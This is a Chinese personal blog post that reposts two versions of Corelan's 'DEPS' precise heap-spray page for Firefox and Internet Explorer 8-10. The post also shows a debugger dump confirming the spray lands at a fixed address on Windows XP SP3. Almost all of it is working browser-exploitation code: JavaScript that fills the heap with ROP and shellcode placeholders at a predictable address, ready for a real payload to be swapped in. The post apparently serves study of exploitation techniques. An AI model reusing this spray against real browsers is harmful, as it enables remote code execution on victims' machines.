注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

【收集】Corelan "DEPS" - Precise heap spray for FF/IE8/IE9/IE10  

2014-11-25 10:55:35|  分类: 搜集 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
2个HeapSpray样例:
第一个:
<!-- Corelan "DEPS" - Precise heap spray for FF/IE8/IE9/IE10 - corelanc0d3r www.corelan.be 2013 -->
<html>
<head></head>
<body>
<div id="blah"></div>
<script language = 'javascript'>
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x104;
junk = unescape("%u2020%u2020");
while (junk.length < 0x1000) junk += junk;
rop = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444%u4545%u4545%u4646%u4646%u4747%u4747");
shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
data = junk.substring(0,offset) + rop + shellcode
data += junk.substring(0,0x800-offset-rop.length-shellcode.length);

while (data.length < 0x80000) data += data;
// Targets: 
// FireFox : 0x20302210
// IE 8, 9 and 10 : 0x20302228
for (var i = 0; i < 0x500; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);
div_container.appendChild(obj);
}
alert("spray done");
</script>
</body>
</html>

第二个:
<!-- Corelan "DEPS" - Precise heap spray for FF/IE8/IE9/IE10 - corelanc0d3r www.corelan.be 2013 -->
<html>
<head></head>
<body>
<div id="blah"></div>
<script language = 'javascript'>
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x104;
junk = unescape("%u2020%u2020");
while (junk.length < 0x1000) junk += junk;
rop = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444%u4545%u4545%u4646%u4646%u4747%u4747");
shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
data = junk.substring(0,offset) + rop + shellcode
data += junk.substring(0,0x800-offset-rop.length-shellcode.length);

while (data.length < 0x80000) data += data;
// Targets: 
// FireFox : 0x20302210
// IE 8, 9 and 10 : 0x20302228
for (var i = 0; i < 0x250; i++) 
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58); 
obj.style.fontFamily = data.substring(0,0x40000-0x58); 
div_container.appendChild(obj);
}
alert("spray done");
</script>
</body>
</html>

我的xpsp3上调试如下:
0:003> dd 20302228
20302228  41414141 42424242 43434343 44444444
20302238  45454545 46464646 47474747 cccccccc
20302248  cccccccc cccccccc cccccccc 20202020
20302258  20202020 20202020 20202020 20202020
20302268  20202020 20202020 20202020 20202020
20302278  20202020 20202020 20202020 20202020
  评论这张
 
阅读(167)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017